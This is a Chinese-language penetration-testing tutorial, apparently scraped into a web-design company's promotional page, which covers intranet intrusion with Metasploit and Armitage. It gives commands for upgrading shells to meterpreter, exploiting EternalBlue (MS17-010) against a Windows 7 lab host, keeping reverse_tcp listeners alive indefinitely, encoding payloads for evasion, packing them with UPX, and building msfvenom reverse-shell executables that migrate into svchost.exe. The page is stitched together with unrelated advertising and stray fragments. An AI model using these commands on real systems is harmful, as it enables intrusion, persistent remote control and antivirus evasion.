本篇內(nèi)容主要講解“如何解決內(nèi)網(wǎng)滲透問(wèn)題”,感興趣的朋友不妨來(lái)看看。本文介紹的方法操作簡(jiǎn)單快捷,實(shí)用性強(qiáng)。下面就讓小編來(lái)帶大家學(xué)習(xí)“如何解決內(nèi)網(wǎng)滲透問(wèn)題”吧!
十余年的臨猗網(wǎng)站建設(shè)經(jīng)驗(yàn),針對(duì)設(shè)計(jì)、前端、開(kāi)發(fā)、售后、文案、推廣等六對(duì)一服務(wù),響應(yīng)快,48小時(shí)及時(shí)工作處理。全網(wǎng)整合營(yíng)銷推廣的優(yōu)勢(shì)是能夠根據(jù)用戶設(shè)備顯示端的尺寸不同,自動(dòng)調(diào)整臨猗建站的顯示方式,使網(wǎng)站能夠適用不同顯示終端,在瀏覽器中調(diào)整網(wǎng)站的寬度,無(wú)論在任何一種瀏覽器上瀏覽網(wǎng)站,都能展現(xiàn)優(yōu)雅布局與設(shè)計(jì),從而大程度地提升瀏覽體驗(yàn)。創(chuàng)新互聯(lián)從事“臨猗網(wǎng)站設(shè)計(jì)”,“臨猗網(wǎng)站推廣”以來(lái),每個(gè)客戶項(xiàng)目都認(rèn)真落實(shí)執(zhí)行。
python -c "import pty;pty.spawn('/bin/bash');" 會(huì)話提升
session -u 4 將shell會(huì)話提升成meterpreter會(huì)話
直接修改payload,原來(lái)的設(shè)置的payload為shell的木馬也能連上
apt-get install armitage 安裝
armitage 進(jìn)入界面
不用改直接進(jìn)入
選擇快速查詢
輸入要查詢的地址
nmap出來(lái)存活的主機(jī)有(1是物理電腦,2是網(wǎng)關(guān),135是linux靶機(jī),254是廣播地址,128是win7靶機(jī),129是本機(jī))
拒絕訪問(wèn)打開(kāi)服務(wù)管理器
用所有的漏洞進(jìn)行探測(cè)
搜索ms17
移過(guò)去
存在永恒之藍(lán)的漏洞
進(jìn)行滲透
滲透成功
handler -H 192.168.1.129 -P 4444 -p windows/meterpreter/reverse_tcp |
show advanced 顯示高級(jí)參數(shù)設(shè)置
set ExitOnSession false 監(jiān)聽(tīng)到shell之后端口繼續(xù)監(jiān)聽(tīng)
set SessionCommunicationTimeout 0 設(shè)置會(huì)話存活時(shí)間,默認(rèn)5分鐘
set SessionExpirationTimeout 0 設(shè)置會(huì)話存活時(shí)間,默認(rèn)一星期
EnableStageEncoding 是否允許stage進(jìn)行編碼
StageEncoder 設(shè)置要用的編碼
優(yōu)秀的編碼:x86/shikata_ga_nai、cmd/powershell_base64
加殼
upx -9 qq.exe -1壓縮更快 -9壓縮更好 -d解壓 -l列表壓縮文件 -t測(cè)試壓縮文件 -V顯示版本號(hào) -h給予更多幫助 -L顯示軟件許可證 |
測(cè)試壓縮文件能否運(yùn)行
upx -t qq.com OK表示可以運(yùn)行 |
回到頂部
(會(huì)在運(yùn)行木馬的時(shí)候自動(dòng)遷移到svchost.exe的對(duì)應(yīng)進(jìn)程中去)
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.129 lport=4444 PrependMigrate=true PrependMigrateProc=svchost.exe -f exe -o shell.exe |
回
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.227.129 lport=4444 -e cmd/powershell_base64 -i 14 -f exe -o shell.exe |
到此,相信大家對(duì)“如何解決內(nèi)網(wǎng)滲透問(wèn)題”有了更深的了解,不妨來(lái)實(shí)際操作一番吧!這里是創(chuàng)新互聯(lián)網(wǎng)站,更多相關(guān)內(nèi)容可以進(jìn)入相關(guān)頻道進(jìn)行查詢,關(guān)注我們,繼續(xù)學(xué)習(xí)!